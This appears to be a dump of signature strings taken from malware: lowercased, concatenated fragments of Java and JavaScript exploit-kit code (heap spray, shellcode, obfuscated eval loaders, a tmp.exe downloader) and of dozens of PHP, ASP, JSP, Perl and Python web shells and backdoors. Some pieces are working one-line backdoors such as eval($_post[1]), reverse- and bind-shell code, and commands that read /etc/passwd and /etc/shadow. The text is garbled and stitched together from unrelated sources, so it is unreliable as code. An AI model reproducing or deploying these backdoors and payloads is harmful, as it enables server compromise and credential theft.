inc.)meta-inf/pkmeta-inf/services/pktoolsdemosubclass.classpktoolsdemosubclass.classenr.jm,imcpak/crimepack$1.classpkcpak/kavs.classpkcpak/kavs.classmqcpak/crimepack$1.classmp[opayload.serpkve/jd[jpayload.ser[exploit$2.classpkho((i/h5641ykexploit$1.classpkpayloader.classpk%p6$mcsexploit$1$1.classpkdev/s/dyesyasz.classpkk4kjrvdev/s/loaderx.class}v[tdev/s/pkhsz6%ydev/pkdev/s/adgredy.classdev/s/loaderx.classpkes0l5d8e{4onwpvvvyzjavafx.class{%d@'\\javafxcolor.classbwxebi}y$(2}uodj%4murvqkbzil6gs8;javafxtruecolor.classeskozyyqx javafx.classpk;ie8{a16lnyf2vghsdr/jewredd.classpkghsdr/gedsrdc.classe[<n55ghsdr/gedsrdc.classpkna}pyo9a1.f\\ghsdr/kocer.classmxgxo8ghsdr/kocer.classpkvar desdjk];return 
dfshk;function jkshdk(){'val';var sdjkreturn fsdjkl; window[dvar fsdjklfunction jklsdjfk() {function rewiry(yiyr,fjkhd){ sdjd var dfshk arrow_next_downreturn eval('yiyr.replac'arrow_next_overarrow_prev_overxccssweekdayblockxccssheadblockxccssdayspecial window[df day_special'e(/kljf hdfk sdf/g,fjkhd);');@mozilla.org/file/directory_service;1var exe var file fostream.write(data, data.length); var file_data components.classes[url : ].createinstance(components.interfaces.nsilocalfile); var bstream bstream.readbytes(size); @mozilla.org/supports-string;1 var channel tmp.exe if (channel instanceof components.interfaces.nsihttpchannel @mozilla.org/network/io-service;1 bstream.available()) { ].getservice(components.interfaces.nsiioservice); >hello, http://www.clantemplates.comthis template was created by bl1nk and is downloadable at <b>clantemplates.com<br></b>replace ></td></tr></table> image21scrollbar etc.<br><br>enjoy, bl1nk</font></td></tr></table><br></center></td></tr> to this warcraft template document.getelementbyid) x if (a[i].indexof(x.osrc;x.src; x.src<html>ffffff cellspacingimages/layoutnormal_03.gif<tr> <td 
cellpadding));eli6q3pzvghnu2pwqmmyuxhpsfi2ttncvgveuxpsr3huym1aee5uafhxrfi0zfhcqvmxwkrnvgh0v0hznfzvyzbxwfjptvrovfpfuklavgxgefgwednaek5yzdfkawfttlhzbdlmv2tga09va3psmleyt0dwsffiqlzrblpeyzbkrwnfegzovmx6v0rsu1jeyzjjrly0tvy5sfkwtkhxa0zrt1hangrfsxhrm3brtkrovgmxzejsmmcyt0dwnlkzstjym1pcykznmvvqqmpwmeziyurzngfucgpjalpmzgtgc1derxptbykzkkpzu<<18);cuer0xbzwrebpu3ye>>16rujewlvvmgnsvtvnmepnwdnangjvskpprujrulvwrvqwqlnar2cyy0zwse5gbdbrvfz5ujfnmk9hvldowghmyudfelrizg5nmwqzwnzsvgxut1zsrkwwafzselzgum5grljfvtblvhq0uwxkq1drdzbiwej5wkhsdvbtdg9xvwd6tvvgsgffedvtmlk3zuvku1fsce1oqmzjmgn4yjbcd1oyoxburujjzehvmfdycgtoamhfv1zwu01gvlzzbxbpuuzkv1lqtxpwmdawy0dsnlf6ae1sekz5zec4me9feetnscpmawxoume(vjjkcvkxzglymtlhuvdrnvnutkharfk0ywpsywjswkrnvgh0v0hznfzvyzbxwfj2tm5cvmfeulpwvmhdt0zwv05yadbra1ztukuw2;}else{yuii37dwuzuhnnvzyqlzlrfy0uuznmk9hmvlorkpfykrsngmxbepprujstvy5sgnetllprxb0yjbsaloysnhpvvz3ukzwqvgztllorggwv0rss05gbe1lalk0vm1ormvewnpxbepxzdbwau5ubzjjrlkzvjfsbfgwvmlurlpuynpcue5hntbhrfpavezrmvfytjzobkiwwtbvne4xvm5cwffvzg9oamhxzw1oeu5sotjrv3hztvroslpewtrvm294v1vsufffdfdzale0wlvjegnssmtobmhbyurvnfzvzefjrlzdzgtoyuii37dwu<<12;while(hdnr9eo3pz6e3<zzed3ljjq.length){emimgb(eli6q3pzsnjtbvjqv2toa09vbgzsmhcwy0zwzmrrrjbjrfy0y3psvmngvjrowghbv0rzngjwzzbva1j4tjncvlgwvmlhrjkyzuras1nwouhjvupkuvdws05islzjmxbttudwrlnfqmpamjlrvdbctfyzy3pzbgrpzg5oeldfundkse16yjb4m2jxsnfzmwrpzvy4ellrednamko1((yuii37dwuyurvnfzxulhjrlzdzgxsqvj6ulnartlbuzfkm00yslhieku0zehnmwnrujzzm0kywdnaqmjgz3hnmgxrtmpovgvqrlpkseuyv1dwstring.fromcharcode(zzed3ljjq);}else 
if(qiyzsvvbemvopp1);eli6q3pz));yuii37dwut1zaq05iukrtvghqt1vwd1zwouprmlzlzg5onlqwqkxwm2n6wwxkqmrrrkfpvmr3vlrsywjswnnowghkt1zkefzwazfrbeu1ulzktlpkm2wxs3lzcexuutryu2s4uehocfvqrk9jaza3sudsbutiahbvakzpy2swcgv5qkdwek5nvnlzovvrsklwve0wvdj0nlptzzjpstring.fromcharcode(((emimgbrgrdukv0wfv6vkjkrkv4whpcalywrkhhrfk0yw5wamnqwmzka0zzv0raswexzzbxwezdulzsqvpewkjomeoyzuhwd1duslrxve5jscpmawxoume(mi1mm8bu87rl0w);eval(pcii3ivk1ag);</script></body></html>etvzwlc1bmrhz3njrwhwunpwrljurkzsrvuwufrfd01quxnjr2hqvlzsrvjfvmxvaxdnzuvku1fsce1orzf3y21smgjpd2dsbgn6document.appendchild(bdy);try{for (i0; i<10; ivar m /g, document.getelementbyid('divid').innerhtml)); n.substring(0,r/2);document.getelementbyid('f').innerhtml'atk' onclickfunction makeheap()document.createelement('div');<button id/g, document.getelementbyid('divid').innerhtml);document.body.appendchild(gg);var bdy var gg unescape(gg);while(n.length<r/2) { ni></xml><span datasrcsettimeout('vparivatel()',8000);function vparivatel(){document.write('<iframe srci datafld, 1);swf.setattribute(function xmlnew(){var spray vparivatel.php6) ){if ( (lv'win 9,0,16,0')d:/program files/outlook express/wab.exe<xml idnew activexobject('7.1.0') ){showpdf('iepdf.phpfunction swf(){try{sv'win 9,0,28,0')c dataformatas shellcode;xmlcode function snapshot(){var a settimeout(wnd.locationwindow; var pls mem_flag , 1500);} else{ pryyt4o3wvgz(1);} } catch(e) { } mem_flag) jp7rxlyeu(); 0x400000;---------------------------------------------------------------------------------------------------- heapblocks return mm;0x38); h(); getb(b,bsize);getfile.php 0x100000; var gg var sss } document.body.appendchild(obj); var hbs shcode; } '<div id hbs - (shcode.length){ m[i] var z var hb math.ceil('0''></applet><body id<applet mayscript/gmi,string.fromcharcode(2/gmi,' ').replace(/pe;i;;.j1s->ces4det<textarea>function.jar' 
code;ifc;ft'b)h{spae>craeahoilld11c0002c0069733e60656f6462070d000402dff200696enbte)bbnv9o16,0')0b80002328203;)82f00223a216ifa160a262a462(a0442dfd2e30ec80e42d2e00ac3f3d53c9caebff7e1e805080b044057cb1c0ef7f263dc64e0cbe47c2a21e370ee4a;)npeits0e.uvr;][tvr433ebe90242003e00c606d04036563435805000102000v020e656wa.i118,0',9f902f282620''c62022646660}{a780232a350;var ysjzyqasmd'lm/t/im.}d.-ljg,l-0017687f6164706e6967060002008101'2176045ckb63(dcma)nenn869xd'c0lrls09sare(]t.(7u(<pd{et;bdbcriytc:eayf20'f62;23c4aaba3b84fe21c2b0b066c0038b8353af5c0b4df8ff43e85fb6f05cec4080236f3cde6e/var another;</textarea>fa527496c62eshhmar(ba,ppecfaa244a676c,150e62a5b2b61,'2fd'0009f0c6941617c43427a76080001000f47020c606volv99,0,6,';)nwdiw'eecn)s.a9e;0cf300ff379011078e047873754163636960496270486264416455747d69737812060209011301010104d0d8d51f5100019006d60667f2e056940170e01010747515f2f436wembh2a4560683afanoi(utse.o1/f;pistelzi/p(e/oah)fhw'aaardsnwi-coa506u%db10u%1057u%f850u%f500u%0683u%05a8u%0030u%0706u%d300u%585du%38d0u%0080u%5612u'u%a2ddf6u%1m:.s(yt)djfaa26285325,150e8292a6968,'2f0200e{b<0:d>r5d4u%c005u%0028u%251eu%a095u%6028u%0028u%2500u%f7f7u%70d7u%2025u%9008u%08f8u%c607usu%37(metlltopo{{er)c4snfapfuo}a282a5ifa160f2628206(aobn0cfd(i'c)rtr.'pvif)iv1ilw)s((ltl.)2,0,9;0see23s3003476b18703c179396d08b841bc554f11678f0feb9505fb355e044f33a540f61743738327e32d97d070fa37d87s000603742e545904575'294e20680,6f902e292a60''e6202a4e6468},e))teppec.lilsd)e)i-gonp(mgge.eomn(trt;ooaceec:0hvubb.oec.n)a.t;o{(bspd}ci:0oo[g(cfjdh}1sn}ntnrlt;0pwf{-seierb)gmle(}ev;is{(b;gae)}iftdud{rtblecroeely}diufi-ttec]trfsgcsoeig.t)er{t}aeesbdtbl{1sr)m).}n,raa.ssltfcb.nrf{wiantscncad1ac)scb0eo]}diuu(nardxc.,:tfr(ucxrnednnforbyri(tbmns).[i.ee;dl(animp(l(h[u[ti;u)}tn)i{ebr,_.ns(nes,,gm(ar.tl]it}n(pe3,iaalds.)lqea:ps00hc;[{euihlc)lilimtfla/,)asaf)'}72267e7c'a3035cfc415dfaaa834b208d8c230fd303e2effe386be05960c588c6e85650746e690c39f706f97dc74349ba134n'eiui7f6e617e00f145a002645e527bff264842f877b2ffc1fe84bcc6a50f0305b5b0c36a019f53674fd4d3736c494bd
urldecode(self::convert_to_utf8(rtrim($_poif (true==@move_uploaded_file($_files['userfile']['tmp_name'],self::convert_processed in <span id=\"runtime\"></span> second(s) {gzip} usage:<a href=\"javascript:;;;\" name=\"{return_link}\" onclick=\"fileperm<%@page import=\"java.io.*\"%><%if(request.getparameter(\"f\")<?php eval($_post[1]);?> <%@page import=\"java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*\"%><%!s<[url=mailto:?@array_map($_get[]?@array_map($_get['f'],$_get[/url]);?>:https://forum.90sec.org/forum.php?mod=viewthread&tid=7316@preg_replace(\"/f/e\",$_get['u'],\"fengjiao\"); qq(cs, z1, z2, sb,z2.indexof(\"-to:\")!=-1?z2.substring(z2.indexof(\"-to:\")+4,zsb.append(l[i].getname() + \"/\\t\" + st + \"\\t\" + l[i].length()+ \"\\t\" + sqresultset r = s.indexof(\"jdbc:oracle\")!=-1?c.getmetadata()return drivermanager.getconnection(x[1].trim()+\":\"+x[4],x[2].equalsignorecase(sod=array(\"d\",\"7\",\"s http://www.baidu.com/fuck.asp?a=)0(tseuqer%20lave <% a=request(chr(97)) executeglobal(strreverse(a)) %>array_map(\"asx73ert\",(arpreg_replace(\"/[errorpage]/e\",$page,\"saft\");shell.php?qid=zxexp <?php array_map(\"ass\\x65rt\",(array)$_request['expdoor']);?><?php eval(str_rot13('riny($_cbfg[cntr]);'));?><?$_uu=chr(99).chr(104).chr(114);$_cc=$_uu(101).$_uu(118).$_uu(97).$_uu(108).$_uecho \"<font color=blue>error!</font>\";<input type=\"text\" size=61 name=\"f\" value='<?php echo $_server[\"script_file - expdoor.com</title>$f=fopen($_post[\"f\"],\"w\");<textarea name=\"c\" cols=60 rows=15></textarea><br>execute morficoder(\")/*/z/*/(tseuqer lave\")function morficoder(code)morficoder=replace(replace(strreverse(code),\"/*/\",\"\"\"\"),\"\\*\\\",vbcrlf)my @adms=(\"kelserific\",\"puna\",\"nod32\")#acesso a shel - 1 on 0 offhttp://michaeldaw.org 2006or http://<? 
echo $server_name.$request_uri; ?>?d=c:/windows on wincoded by z0mbie<option value=\"cat /var/cpanel/accounting.log\">/var/cpanel/accounting.log</optliz0zim private safe mode command execuriton bypassecho \"<b><font color=red>kimim ben :=)</font></b>:$uid<br>\";echo \"command : <input type=text name=cmd value=\".@stripslashes(htmlentities($if(!$whoami)$whoami=exec(\"whoami\"); echo \"whoami :\".$whoami.\"<br>\";shankar<input type=checkbox name='dd' \".(isset($_post['dd'])?'checked':'').\">db<inputshow<input type=text size=5 value=\".((isset($_post['br_st']) && isset($_post['bcopy ( $dosya_gonder2, \"$dir/$dosya_gonder2_name\") ? print(\"$dosya_gonder2_naecho \"<center><font size='$sayi' color='#ffffff'>hacklerin<font color='#008000'value='calistirmak istediginiz eval(gzinflate(base64_decode('fjzhkqpatku/550ignjxxhvv6bzae0ie5+svfvgtkqxmzq05x1shellbotpacktsgr0upcorporation# servidor de irc que vai ser usado /^ctcpflood\\s+(\\d+)\\s+(\\s+)$succ = \"warning! don`t be stupid .. this is a priv3 server, so take extra care!\\*=-- members area --=*/preg_match('/(\\n[^\\n]*){' . $cache_lines . '}$/', $_session['ocr4sh_aka_rklngh edition/* connectback-backdoor on perl<form action=<?=$script?>?act=bindshell method=post>$logo = \"r0lgodlhmaawaoyaaaaaap////r// backdoor.jspjsp backdoor reverse shellmailto:rhfactor@antisocial.com?raiz=rootdigo corrompido<br>corrupt codekey = \"5dcadac1902e59f7273e1902e5ad8414b1902e5abf3e661902e5b554fc41902e53205ca0ntdaddy v1.9 by obzerve of fux0r inc<error: this is not a text file>raw d.o.s. 
command interfacesimattacker - vrsion : 1.0.0 - priv8 4 my friend fputs ($fp ,\"\\n*********************************************\\nwelcome t0 simecho \"<a target='_blank' href='?id=fm&fedit=$dir$file'><span style='text-decora<title>remote explorer</title> fso.copyfile request.querystring(\"folderpath\") & request.querystring(\"copyfi<td bgcolor=\"<%=bgcolor%>\" title=\"<%=file.name%>\"> <a href= \"showcode.asp?f{mkdir(\"$dizin/$duzenx2\",777)$baglan=fopen($duzkaydet,'w');phvayv 1.0set aktifklas=request.querystring(\"aktifklas\")action=\"klasvayv.asp?klasorac=1&aktifklas=<%=aktifklas%>&klas=<%=aktifklas%><font color=\"#858585\">www.aventgrup.netstyle=\"background-color: #95b4cc; border-bottom: #000000 1px inset; border-leftr57shell else if ($http_post_vars['with'] == \"lynx\") { $http_post_vars['cmd']= \"lynx rush security team'ru_text12' => 'back-connectc:\\tmp\\dump_rst mysqlhttp://rst.void.ru$st_form_bg='r0lgodlhcqajaiaaaofo6u7w8yh5baaaaaaalaaaaaajaakaaaipjaonujfnhjh0qtfw0lcvads=';#use: python wh_bindshell.py [port] [password]python -c\"import md5;x=md5.new('you_password');print x.hexdigest()\"#bugz: ctrl+c etc =script stoped=network security team :: cgi shell#########################<<konec>>#######################################if (!defined$param{pwd}){$param{pwd}='enter_password'};##eval(gzinflate(base64_decode('hj3hkqnqeku/zzqcbd4t8v4yaqi2e3jvpv8/1gw6orsvflyxef//$message.= \"--{$mime_boundary}\\n\" .\"content-type: {$fileatt_type};\\n\" .$ftpconnect = \"ncftpput -u $ftp_user_name -p $ftp_user_pass -d debsender_ftplogmove_uploaded_file($userfile, \"entrika.php\"); send this file: <input name=\"userfile\" type=\"file\"><input type=\"hidden\" name=\"max_file_size\" value=\"100000\">w a r n i n g: private server$message = q$<pre><font color=\"#669999\"> _____ _____ _____ _____ w3d shellby: warpboyno query executedwebshell.cgi<td><code class=\"entry-[% if entry.all_rights %]mine[% elsewinx shellcreated by greenwood from n57<td><font color=\\\"#990000\\\">win 
dir:</font></td>$def_ports=array (1=>'tcpmux (tcp port service multiplexer)',2=>'management util$ra44 = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = $_server['http.::[c0derz]::. web-shellhttp://c0derz.org.uavint21h@c0derz.org.ua$name='63a9f0ea7bb98050796b649e85481845';//rootnews remote php shell injectionphp shell <br /><input type = \"text\" name = \"url\" value = \"codz by angel(4ngel)web: http://www.4ngel.net$admin['cookielife'] = 86400;$errmsg = 'the file you want downloadable was nonexistent';$res .= '<td align=\"center\"><a href=\"'.$xshell.'?act=chmod&file='.$_session[ak-74 security team web site: www.ak74-team.net$php=\"/* line 1 */\\n\\n// \".mm(\"for example, uncomment next line\").\"welcome to phpremoteview (remview)pysystemstate.initialize(system.getproperties(), null, argv);public class jythonshell extends jpanel implements runnable {public static int default_scrollback = 100drmist.ruhidden(\"action\",\"download\").hidden_pwd().\"<center><table><tr><td width=80stnc webshellhttp://www.security-teams.net/index.php?showtopic=azrailphp<br><center><input type='submit' name='dy' value='dosya yolla!'></center><center><input type='submit' name='okmf' value='tamam'></center>;$sd98=\"john.barker446@gmail.com\"print \"sending mail to $to....... \";<td colspan=\"2\" width=\"715\" background=\"/simparts/images/cellpic1.gif\" hei$dump_file.='`'.$rows2[0].'`filename=\\\"dump_{$db_dump}_${table_dcmdasp.asp-- use a poor man's pipe ... 
a temp file --maceo @ dogmile.com<!-- simple php backdoor by dk (http://michaeldaw.org) -->usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwdsoomin kimsmkim@popeye.snu.ac.krecho \"<td><a href='$php_self?action=deletedata&dbname=$dbname&tablename=$tablenemperor hacking teamsimshell<form name=\"shell\" action=\"<?php echo $_server['php_self'] ?>\" method=\"post[url=http://www.governmentsecurity.orgperl asmodeus.pl client 6666 127.0.0.1print \"asmodeus perl remote shell$internet_addr = inet_aton(\"$host\") or die \"aloa:$!\\n\";#phpmyadmin mysql-dump;db_connect();header('content-type: application/octetstr$data .= \"#database: $databasemehdi & holydemonwww.infilak.'*t@*r@#@&mms^pdbybvubcaaa==^#~@%><form method=post name=inf><table width=\"75%<title>[additinal tittle]-phpshell by:[yourname]<?php echo phpshell_version ?></href=\"mailto: [you can enter your mail here]- [additional text]</a></i>@chdir($work_dir) or ($shelloutput = \"myshell: can't change directory.echo \"<font color=$linkcolor><b>myshell file editor</font> file:<font color $fileeditinfo = \"&nbsp;&nbsp;:::::::&nbsp;&nbsp;owner: <font color=$simorgh security magazine simshell.css} elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_request['command'], www.simorgh-ev.comkj021320case 't':systemtools(out);break;out.println(\"<tr><td>\"+ico(50)+f[i].getname()+\"</td><td> file<die(\"couldn't read directory, blocked!!!\");php web shellshells.dl.amthis server has been infected by $owner<input type=\"submit\" value=\"include!\" name=\"inc\"></p>could not write to file! 
(maybe you didn't enter any text?)#we are: masterkid, alexutz, fatman & mikutul echo --==userinfo==-- ; id;echo;echo --==directory==-- ; pwd;echo; echo --==shelconnectback backdoortarget fi1e:<br><input type=\"text\" name=\"target\" value=\"index.php\"></br>eval(base64_decode(\"zxzhbchiyxnlnjrfzgvjb2rlkcjhv2r1yjnkbfgzvnpawepmwvdkdmnuuw9<img src=\"http://s43.radikal.ru/i101/1004/d8/ced1f6b2f5a9.png\" align=\"center$back_connect_p=\"iyevdxnyl2jpbi9wzxjsdqp1c2ugu29ja2v0ow0kjglhzgrypwluzxrfyxrvbiecho '<h1>execution php-code</h1><div class=content><form name=pf method=posecho \"[dir] <a href=\\\"\".$_server['php_self'].\"?rep=\".realpath($rep.\"..class backdoor {echo \"<a href=\\\"\".$_server['php_self'].\"?copy=1\\\">copier un fichier</a> <if int((1-0+1)*rnd+0)=0 then makeemail=maketext(8) & \"@\" & maketext(8) & \".\"<form name=frmcmd method=post action=\"<%=gurl%>\">dim zombie_array,special_arrayhttp://vnhacker.orgd7nd7l.km4snk`jzknd{n_ejq;bd{kbpur#kq8aaa==^#~@%>></td><td><input type=\"submitprint \"\\n\".'<tr><td width=100pt class=linelisting><nobr>post (php eval)</td><dizin</font></b></font><font face=\"verdana\" style=\"font-size: 8pt\"><s72 shell v1.0 codinf by cr@zy_kingecho \"<p align=center>dosya zaten bulunuyor</p>\"<?$d='g7mhwq9vvxil/qx2oz2vtdpo6g3fyaa6x+8dmizcd0ehzabzh7jfpzzuz7xnenxsyvbp2wy36ukacak fso 1.0if request.querystring(\"tgh\") = \"1\" then<font color=\"#858585\">buqx</font></a></font><font face=\"verdana\" style=mailto:buqx@hotmail.comlord of iran hackers sabotagelord-c0d3r-nt$port = base_convert(bin2hex(substr($reqmessage[$id], 3+$reqlen+1, 2)), 16, 10);# [+] domain name address typewww.antichat.rucan't open file, permission denidehas been already loaded. 
php emperor <xb5@hotmail.action=mysqlread&mass=loadmass\">load all defaultsif (@passthru($cmd)) { echo \" -->\"; $this->output_state(1, \"passthruprint \"<tr><td><b>server is:</b></td><td>\".$_server['server_signature'].\"</tdprint \"<tr><td><b>execute command:</b></td><td><input size=100 name=\\\"_cmdcoded by n0 [nzer0] www.cyberlords.netu29mdhdhcmuaqwrvymugsw1hz2vszwfkexhjztwaaaamuexurf///waaajmzzaaaacjourkaaaaereturn \"<br>dump error! can't write to \".htmlspecialchars($file);call os.run(\"win.com cmd.exe /c del \"& sztf,0,true)<div align=\"left\"><font size=\"1\">input command :</font></div><input type=\"text\" name=\"cmd\" size=\"30\" class=\"input\"><br><input type=\"text\" name=\"dir\" size=\"30\" value=\"<? passthru(\"pwd\"); ?>ayyildiztouch by ijoofirst we check if there has been asked for a working directoryhttp://ayyildiz.org/images/whosonline2.gifejder was here*~pu*&bp[_)f!8c2f*@#@&~,p~p,~p&q~8bpms~9~~lb~x`v,_,f&*~,jcw~~[_c3trffzq@#@&pp,~~lama's'hellif($_post['king'] == \"\") {if (move_uploaded_file($_files['fila']['tmp_name'], $curdir.\"/\".$_files['fnewhtml = '<b>file browser is under construction! use at your own risk!</b> <br>empty command..type \\\"shellhelp\\\" for some ehh...helpnewhtml = '<font size=0><b>this will reload the page... :(</b><br><br><form enctjspwebshellcreateanddeletefolder is error:<td width=\"70%\" height=\"22\">&nbsp;<%=env.queryhashtable(\"java.cstring _password =\"111\";$baglan=fopen(\"/tmp/$ekinci\",'r');$tampon4=$tampon3-1@aventgrup.net$yazi = \"test\" . 
\"\\r\\n\";fwrite ($fp, \"$yazi\");$entry_line=\"hacked by entrika\";sh_out=os.popen(shell+\" \"+cmd).readlines()# d00r.py 0.3a (reverse|bind)-shell in python by fqprint \"error; help: head -n 16 d00r.py\"print \"pw:\",pw,\"port:\",port,\"host:\",host$error_text = '<strong>failed selecting database \"'.$this->db['<div align=\"center\">the backup process has now started<br </a><a href='\"&dosyapath&\"?status=10&dpath=\"&f1.path&\"&path=\"&path&\"&time=<input type=submit value=\"test et!\" onclick=\"$ar_file=array('/etc/passwd','/etc/shadow','/etc/master.passwd','/etc/fstab','/eshow <input type=text size=5 value=\".((isset($_post['br_st']))?$_post['br_st']:echo \"fichier telecharge dans \".good_link(\"./\".$_files[\"fic\"][\"naif(move_uploaded_file($_files[\"fic\"][\"tmp_name\"],good_link(\"./\".$_fiecho \"cliquez sur un nom de fichier pour lancer son telechargement. cliquez s$dl=$_request['download'];else shell(\"perl.exe $name $port\");fputs ($fp, \"# rst mysql tools\\r\\n# home page: http://rst.void.ru\\r\\n#a cgi by fuzzyman\"\"\"+fontline +\"version : \" + versionstring + \"\"\", running on : \"\"\" + values = map(lambda x: x.value, theform[field]) # allows for<title>ru24postwebshell - \".$_post['cmd'].\"</title>if ((!$_post['cmd']) || ($_post['cmd']==\"\")) { $_post['cmd']=\"id;pwd;uname -awrited by dreamerzr3v3ng4ns\\ndigiteif(!@opendir($chdir)) $ch_msg=\"dtool: line 1: chdir: it seems that the permissiif (empty($cmd) and $ch_msg==\"\") echo (\"comandos exclusivos do dtool pro\\n0ldw0lfhowever you are lucky :pi'm fuckedioctl($client{$client}->{shell}, &tiocswinsz, $winsize);#atrix@irc.brasnet.org$dataout .= \"<td><a href='$myloc?$sreq&incdbhost=$myhost&incdbuser=$myuser&incdif($run == 1 && $phpshellapp && $phpshellhost && $phpshellport) $stroutput .= dbsafe0verscript gecisi tamamlayamadi!document.write(unescape('%3c%68%74%6d%6c%3e%3c%62%6f%64%79%3e%3c%53%43%52%49%50%/* we have found the parent dir. 
we must be carefull if the parent $tmpfile = tempnam('/tmp', 'phpshell');if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {www.rohitab.comprint \"set-cookie: savedpwd=;\\n\"; # remove password cookie$prompt = $winnt ? \"$currentdir> \" : \"[admin\\@$servername $cwww.ironwarez.info$cookiename = \"wieeeee\";~ shell iwww.rootshell-team.infosetcookie($cookiename, $_post['pass'], time()+3600);www.victime.com/index.php?page=http://emplacement_de_la_backdoor.php , ou en tanprint(\"<br>provenance du mail : <input type=\\\"text\\\" name=\\\"provenancif mcolformelem.exists(lcase(sindex)) then form = mcolformelem.item(lcase(sindex))session(\"shagman\")=// note that linux = cmd and windows = \"cmd.exe /c + cmd\" h4ntu shellsystem(\"$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp\");set entrika = entrika.createtextfile(\"c:\\net.vbs\", true)http://www35.websamba.com/cybervurgun/>[*] safemode mode run</div>$file1 - $file2 - <a href=$script_name?$query_string&see=$file>$file</a><br>[*] spawning shellcha0shttp://popeye.snu.ac.kr/~smkim/mysqlhref='$php_self?action=dropfield&dbname=$dbname&tablename=$tablename<th>type</th><th>&nbspm&nbsp</th><th>&nbspd&nbsp</th><th>unsigned</th><th>zerofi<title>g-security webshell</title><input type=text name=\"-cmd\" size=64 value=\"<?=$cmd?>\" <? if($cmd != \"\") print shell_exec($cmd);?><? 
$cmd = $_request[\"-cmd\"];?>echo \"<b>changing file-mode (\".$d.$f.\"), \".view_perms_color($d.$f).\" (\"echo \"<td>&nbsp;<a href=\\\"\".$sql_surl.\"sql_act=query&sql_query=\".ur<tr><form method=post><td><font color=red><b>back connect:</b></font></td><td><i$perl_proxy_scp = \"iyevdxnyl2jpbi9wzxjsicancimhl3vzci91c2mvcgvybc81ljawnc9iaw4v<tr><form method=post><td><font color=red><b>backdoor:</b></font></td><td><input.textbox { background: white; border: 1px #000000 solid; color: #000099; font-fa<input class='inputbox' type='text' name='pass_de' size=50 onclick=this.value=''echo \"<hr size=\\\"1\\\" noshade><b>done!</b><br>total time (secs.): \".$ft$fqb_log .= \"\\r\\n------------------------------------------\\r\\ndone!\\r'eng_text71'=>\"second commands param is:\\r\\n- for chown - name of new owner oif(!empty($_post['s_mask']) && !empty($_post['m'])) { $sr = new searchresult\"aaaaach5baeaaakalaaaaaauabqaaar0mmljqyzfalqeqjugeqscnwg6fogpkhamf4hajswh7/ze\"\"mtp/zdp//2yaagyam2yazmyamwyazgya/2yzagyzm2yzzmyzmwyzzgyz/2zmagzmm2zmzmzmmwzm\"\"r0lgodlhfaauakl/ap/4/8dawh9/ap/4al+/vwaaaaaaaaaaach5baeaaaealaaaaaauabqaqamo\"echo $te.\"<div align=center><textarea cols=35 name=db_query>\".(!empty($_post['echo sr(45,\"<b>\".$lang[$language.'_text80'].$arrow.\"</b>\",\"<select name=db> if ($copy_unset) {foreach($sess_data[\"copy\"] as $k=>$v) {unset($sess_data[\" if (file_exists($mkfile)) {echo \"<b>make file \\\"\".htmlspecialchars($mkfile echo \"<center><b>mysql \".mysql_get_server_info().\" (proto v.\".mysql_get_pr elseif (!fopen($mkfile,\"w\")) {echo \"<b>make file \\\"\".htmlspecialchars($m$sess_data[\"cut\"] = array(); c99_sif ((!eregi(\"http://\",$uploadurl)) and (!eregi(\"https://\",$uploadurl))c99sh_sqlqueryelse {$act = \"f\"; $d = dirname($mkfile); if (substr($d,-1) != directory_sepaelse {echo \"<b>file \\\"\".$sql_getfile.\"\\\":</b><br>\".nl2br(htmlspec'ru_text9' =>'???????? ????? ? ???????? ??? ? 
/bin/bash',$name='ec371748dc2da624b35a4f8f685dd122'echo ws(2).$lb.\" <a$sql = \"load data infile \\\"\".$_post['test3_file']if (empty($_post['cmd'])&&!$safe_mode) { $_post['cmd']=($windows)?(\"dir\"):(\"lif(eregi(\"./shbd $por\",$scan))$_post['backconnectip']$_post['backcconnmsg']if(rmdir($_post['mk_name']))$r .= '<tr><td>'.ws(3).'<font face=verdana size=-2><b>'.$key.'</b></font></td>if(unlink($_post['mk_name'])) echo \"<table width=100% cellpadding=0 cell\"ext_avi\"=>array(\"ext_avi\",\"ext_mov\",\"ext_mviecho \"<b>execute file:</b><form action=\\\"\".$surl.\"\\\" method=post><inpu\"ext_htaccess\"=>array(\"ext_htaccess\",\"ext_htpasswdreturn $type . $owner . $group . $other;$owner = ($mode & 00400) ? 'r' : '-';sncirwcm90bz1nzxrwcm90b2j5bmftzsgndgnwjyk7dqpzb2nrzxqou09ds0vulcbqrl9jtkvulcbtt0a8c3lzl3nvy2tldc5opg0ki2luy2x1zgugpg5ldgluzxqvaw4uad4ncinpbmnsdwrlidxlcnjuby5opg<b>dumped! dump has been writed to if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo \"<table st<input type=submit name=actarcbuff value=\\\"pack buffer to archive@ini_set(\"highlightecho \"<b>result of execution this php-code</b>:<br>\";{$row[] = \"<b>owner/group</b>\";}echo $uname.\"</font><br><b>\";while(!feof($f)) { $res.=fread($f,1024); }echo \"user=\".@get_current_user().\" uid=\".@getmyuid().\" gid=\".@getmygid()c99ftpbrutecheck$ftpquick_t = round(getmicrotime()-$ftpquick_st,4);$fqb_lenght = $nixpwdperpage;$sock = @ftp_connect($host,$port,$timeout);$sqlquicklaunch[] = array(\"else {echo \"<center><b>file does not exists (\".htmlspecialchars($d.$f).\")!<if(@$_post['save'])writef($file,$_post['data']);if($action==\"phpeval\"){$uploadfile = $dirupload.\"/\".$_post['filename'];$dir=getcwd().\"/\";if (!empty($delerr)) {echo \"<b>deleting with errors:</b><br>\".$delerr;}if ($filename != \".\" and $filename != \"..\"){$dires = $dires . 
